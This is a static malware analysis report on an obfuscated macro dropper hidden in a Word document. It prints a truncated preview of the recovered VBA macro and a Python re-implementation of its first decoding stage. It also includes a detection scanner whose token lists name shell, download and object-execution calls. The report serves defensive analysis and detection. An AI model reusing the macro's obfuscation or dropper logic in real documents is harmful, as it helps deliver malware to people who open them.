Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8cc391596b990ed9…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 221.5 KB
Created: 2017-11-14 13:16:00
Authoring application: Microsoft Office Word
First seen: 2017-11-20
MD5: 9e62a6632eadbc2cffd5d28a9e415026
SHA-1: 5667ff115721ef06d2a529ba993d9df1c0cf2056
SHA-256: 8cc391596b990ed945280be44b1372b399b58287d31ab751aac0bf27d9c139b6
Risk score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The file contains VBA macros, including a Document_Open event handler, so the code runs as soon as the document is opened in Word with macros enabled (T1204.002 for the user action, T1059.005 for the VBA execution). The ClamAV signature Doc.Dropper.Agent-6374504-0 and the heuristic firings classify it as a dropper: a document whose job is to stage and run a secondary payload. The recovered macro source (macros.bas, below) is heavily obfuscated: dictionary-word identifiers, constants written as folded arithmetic (for example 114 - 59 + 7789, which is 7844), repeated calls to the VBA financial function Pmt whose results are discarded, and Win64 conditional-compilation blocks that redeclare the same variables as LongPtr or Long. The visible code reads a string from a form control (fibrocalcific.penmanship.SelectedItem.Name), takes its last 7844 characters, and passes them through a custom decoder (converted) whose first stage converts the string to ANSI bytes with StrConv(..., 128) and then subtracts 4 from even-offset bytes and 3 from odd-offset bytes (heads = vbKeyShift - 12 = 4); the later table-lookup stage depends on helper functions that fall outside the preview. The URLs listed under EMBEDDED_URL are XML namespace identifiers from embedded image and drawing metadata (Adobe XMP, RDF, Dublin Core, DrawingML), not payload locations. No download URL or executable was extracted, so the second-stage payload remains unknown from static analysis alone.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6374504-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6374504-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    A Document_Open event handler is present. Word runs it automatically when the document is opened with macros enabled, so no further user interaction is needed after the macro-enable prompt.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in the document text (OLE body) and is an XML namespace identifier from embedded image or drawing metadata (Adobe XMP, RDF, Dublin Core, DrawingML), not a download location.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
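The OLE_VBA_DOCOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics above fire on the same idea: an auto-execution entry point paired with shell, download or object-execution tokens, with the p-code variant applied to raw stream bytes when no source can be decoded. The Python below is an added example of that triage logic, not the analysis platform's own code. It scans a buffer as plain text and as UTF-16LE (at both byte alignments), so it works on decoded source such as macros.bas and on compiled VBA stream bytes alike. The token lists, finding names and the two inline samples (one source snippet written in the style of the preview, one synthetic stream) are constructed for the example and are not taken from this file.

```python
import re

# Entry points Office runs with no user action beyond opening the file and enabling macros.
AUTOEXEC_NAMES = ("Document_Open", "AutoOpen", "Auto_Open", "Workbook_Open",
                  "Document_Close", "AutoClose", "AutoExec", "Document_New", "AutoNew")

# Tokens that execute, download, or instantiate objects (a constructed, non-exhaustive list).
EXEC_TOKENS = ("Shell", "WScript.Shell", "CreateObject", "GetObject", "ShellExecute",
               "URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "VirtualAlloc",
               "CreateThread", "RtlMoveMemory", "CallByName")

# Obfuscation traits visible in the preview: junk Pmt calls, Win64 #If blocks,
# StrConv(..., 128) string-to-bytes, and constants written as three-term arithmetic.
OBFUSCATION = {
    "junk_pmt_calls": re.compile(r"^\s*Pmt\s+0\s*,", re.I | re.M),
    "win64_conditional": re.compile(r"^\s*#If\b.*\bWin64\b", re.I | re.M),
    "strconv_to_bytes": re.compile(r"StrConv\s*\([^)]*,\s*128\s*\)", re.I),
    "three_term_constants": re.compile(r"=\s*\d+\s*[-+]\s*\d+\s*[-+]\s*\d+\s*$", re.M),
}


def _word(token: str) -> re.Pattern:
    """Whole-identifier match; the lookarounds keep 'Shell' from matching inside 'ShellExecute'."""
    return re.compile(r"(?<![A-Za-z0-9_])" + re.escape(token) + r"(?![A-Za-z0-9_])", re.I)


def candidate_texts(data: bytes):
    """Views of a buffer that may carry identifiers: decoded source / ASCII string tables,
    and UTF-16LE at both alignments (VBA streams store some strings as UTF-16LE)."""
    yield data.decode("latin-1")
    yield data.decode("utf-16-le", errors="ignore")
    yield data[1:].decode("utf-16-le", errors="ignore")


def triage(data: bytes) -> dict:
    """Return the auto-exec names, execution tokens and obfuscation traits found, plus
    the heuristic-style findings they imply. Works on source text or raw stream bytes."""
    autoexec, exec_tokens, obfuscation = set(), set(), set()
    for text in candidate_texts(data):
        autoexec |= {t for t in AUTOEXEC_NAMES if _word(t).search(text)}
        exec_tokens |= {t for t in EXEC_TOKENS if _word(t).search(text)}
        obfuscation |= {name for name, rx in OBFUSCATION.items() if rx.search(text)}
    findings = []
    if autoexec:
        findings.append("OLE_VBA_AUTOEXEC")
    if autoexec and exec_tokens:          # the pairing the p-code heuristic keys on
        findings.append("OLE_VBA_AUTOEXEC_EXEC")
    if obfuscation:
        findings.append("OLE_VBA_OBFUSCATION")
    return {"autoexec": sorted(autoexec), "exec_tokens": sorted(exec_tokens),
            "obfuscation": sorted(obfuscation), "findings": findings}


# Constructed source snippet in the style of the preview (not the sample's real code).
SAMPLE_SOURCE = b'''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    hominoid
End Sub
Function hominoid()
    donee = 114 - 59 + 7789
    Pmt 0, admiralty, 27945, 16250, 2
#If (21 - 7 * 3) * 2 < (Win64) Then
    Dim ravenous As LongPtr
#End If
    centipede = VBA.StrConv(grimy, 128)
    Set sh = CreateObject("WScript.Shell")
    sh.Run payload, 0
End Function
'''

# Constructed stand-in for a compiled stream: identifiers as UTF-16LE at an odd offset,
# one ASCII identifier, and filler bytes; no source text is present.
SAMPLE_STREAM = (b"\x00\x01\x02" + "Document_Open".encode("utf-16-le") + b"\x00\x00\xff\xfe"
                 + "Shell".encode("utf-16-le") + b"\x00\x00" + b"URLDownloadToFile" + b"\x00")

if __name__ == "__main__":
    print(triage(SAMPLE_SOURCE))
    print(triage(SAMPLE_STREAM))
```

On real input, feed the decoded source (here macros.bas) or each stream read from the OLE container; the UTF-16LE views are what let the same scanner reproduce the p-code heuristic on a document whose source could not be extracted.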

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 40289 bytes
SHA-256: 402018b71b443e23e3f1b4690b93ead1b88fce4a5bb0a2b1473c0a80e2a869d4
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hominoid()
Dim bisulcated As Byte
Dim carnivore As Integer
fibrocalcific.penmanship.Value = Day(#12/5/2013#)
varday = therapeutics = "impulsiveness"
foundered = "decampment"
antisocial = proximate
certified = "stockman"
alula = "splatter"
lycaena = against
counteroffer = "similarly"
courtelle = "huntington"
Set apodidae = fibrocalcific.penmanship.SelectedItem
admiralty = 43 + 40
Pmt 0, admiralty, 27945, 16250, 2
privateer = apodidae.Name
donee = 114 - 59 + 7789
animallike = Right(privateer, donee)
omnifarious = converted(animallike)
clap = 4 + 51
Pmt 0, clap, 9684, 37824, 2
kismet = "aspergillosis"
baldacchino = "lygaeidae"
#If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim worrying As Variant
Dim ravenous As LongPtr
Dim anisoptera As LongPtr
Dim compo As Integer
Dim gecko As Long
Dim desmidium As LongPtr
Dim buttonhole As LongPtr
Dim yager As LongPtr
bacchanal = 76 - 80 + 2068
#End If
#If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim chronologer As Byte
Dim anisoptera As Long
Dim finetoothed As String
Dim ravenous As Long
Dim desmidium As Long
millenarianism = 47 - 44 + 778
Dim buttonhole As Long
Dim yager As Long
bacchanal = millenarianism + 3459
#End If
knobble = 46 - 56 + 10
detritus = "conilurus"
beneficially = 17 - 100 + 4179
ascend = 40 + 38
Pmt 0, ascend, 35503, 42179, 4
combed = partout
concise = "straightbacked"
seines = "dairying"
hypsiprymnodon = 37 + 38
Pmt 0, hypsiprymnodon, 27591, 53253, 2
miscue = omnifarious
victim = "abomination"
ravenous = scrap(miscue)
gastrocybe = embolismal
bountiful = "epithalamium"
Dim intentionality As Integer
Dim innkeeper As Integer
desmidium = 8 - 25 + 17
anisoptera = ravenous + bacchanal
buttonhole = 91 - 60 + 201496
yager = 68 - 120 + 3552
accompanied = autosomal(buttonhole, desmidium, anisoptera, desmidium, desmidium, desmidium, desmidium)
odzookens = 22 + 33
Pmt 0, odzookens, 28400, 15052, 2
End Function
Function converted(grimy) As String
Dim rewarding() As Byte
Dim pianistic As Long
Dim brassard(63) As Long
Dim cloisters(63) As Long
Dim achromatin As Long
Dim bibliography(6962) As Byte
Dim arguer As Long
Dim prophet As Long
Dim bargee(63) As Long
fame = 17 - 95 + 65358
metaphrastic = 114 - 18 + 65440
fracas = 99 - 12 + 16711593
nix = 86 - 106 + 276
anorthite = 128 - 28 - 36
meristem = 128 - 44 + 262060
historiography = 1 - 48 + 302
biologically = 56 - 76 + 4116
Dim sanitaire As String
Dim centipede() As Byte
centipede = VBA.StrConv(grimy, 128)
hiccup = 3 + 12
Pmt 0, hiccup, 22358, 49698, 7
napier = 7840 + 3
heads = vbKeyShift - 12
For carcharhinidae = (3 - 3) To napier
If carcharhinidae Mod (3 - 1) = (4 - 4) Then
centipede(carcharhinidae) = centipede(carcharhinidae) - heads
ElseIf 1 = 1 Then
centipede(carcharhinidae) = centipede(carcharhinidae) - (heads - 1)
End If
Next carcharhinidae
serve = 22 + 33
Pmt 0, serve, 13227, 52276, 8
forewarn = genera
For arguer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
bargee(arguer) = ascites(arguer, anorthite, 50 + 3)
cloisters(arguer) = ascites(arguer, biologically, 50 + 3)
brassard(arguer) = ascites(arguer, meristem, 50 + 3)
Next arguer
Brightness = 57 + 18
Pmt 0, Brightness, 27386, 20261, 4
rewarding = centipede
academical = 47 + 22
Pmt 0, academical, 18094, 33596, 2
purposive = 19 - 76 + 60
missive = 121 - 120 + 1
For prophet = (5 - 5) To napier
botch = rewarding(prophet)
covert = rewarding(prophet + 2)
bouffant = cloisters(forewarn(rewarding(prophet + 1)))
escalation = bargee(forewarn(covert)) + forewarn(rewarding(prophet + purposive))
pianistic = brassard(forewarn(botch)) + bouffa
... (truncated)
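The preview shows the first stage of converted(): Right(privateer, donee) keeps the last 7844 characters of the form-control item name (donee = 114 - 59 + 7789), StrConv(..., 128) turns them into ANSI bytes, and the For loop subtracts heads = vbKeyShift - 12 = 4 from even offsets and heads - 1 = 3 from odd offsets over indices 0..7843 (napier = 7840 + 3). The Python below is an added re-implementation of that stage for an analyst who has recovered the form control's string; it is not code from the sample or from the analysis platform. The later table-lookup stage (bargee, cloisters, brassard) calls helpers (ascites, genera/forewarn) that are outside the preview, so it is deliberately not reproduced here. Assumptions: StrConv(..., vbFromUnicode) is approximated with Latin-1 (the real conversion uses the system ANSI code page), and VBA's Byte overflow error is mirrored by raising ValueError. The test input is a constructed string, not the sample's payload.

```python
# Constants folded from the macro preview.
VB_KEY_SHIFT = 16            # VBA constant vbKeyShift (&H10)
HEADS = VB_KEY_SHIFT - 12    # heads = 4 in the source
NAPIER = 7840 + 3            # For carcharhinidae = 0 To 7843: 7844 bytes
DONEE = 114 - 59 + 7789      # Right(privateer, donee): last 7844 characters


def stage_one(selected_item_name: str, length: int = DONEE) -> bytes:
    """First stage of converted(): take the last `length` characters, convert to ANSI
    bytes (Latin-1 here, an assumption), then subtract 4 at even offsets and 3 at odd
    offsets. VBA stores the result in a Byte array, so a value that would go negative
    raises an overflow error at runtime; this raises ValueError in the same case."""
    tail = selected_item_name[-length:]
    if len(tail) != length:
        raise ValueError(f"input shorter than {length} characters")
    buf = bytearray(tail.encode("latin-1"))          # StrConv(s, 128) -> one byte per char
    for i in range(length):
        delta = HEADS if i % 2 == 0 else HEADS - 1   # If i Mod 2 = 0 ... ElseIf 1 = 1 ...
        if buf[i] < delta:
            raise ValueError(f"byte underflow at offset {i}; VBA would raise overflow here")
        buf[i] -= delta
    return bytes(buf)


def stage_one_inverse(payload: bytes) -> str:
    """Inverse transform, used only to construct test input for stage_one()."""
    out = bytearray()
    for i, b in enumerate(payload):
        delta = HEADS if i % 2 == 0 else HEADS - 1
        if b + delta > 0xFF:
            raise ValueError(f"byte overflow at offset {i}")
        out.append(b + delta)
    return out.decode("latin-1")


def decode_tail(selected_item_name: str) -> bytes:
    """What hominoid() feeds into the rest of converted(): the full 7844-byte first stage."""
    return stage_one(selected_item_name, DONEE)


if __name__ == "__main__":
    # Constructed input, not the sample's real payload; real input is the form control string.
    sample = b"constructed test bytes, not the real payload"
    encoded = stage_one_inverse(sample)
    print(stage_one(encoded, len(sample)))
```

With the real string recovered from the form control, decode_tail() gives the intermediate buffer; the remaining lookup stage has to be reconstructed from the parts of the macro that the preview cuts off.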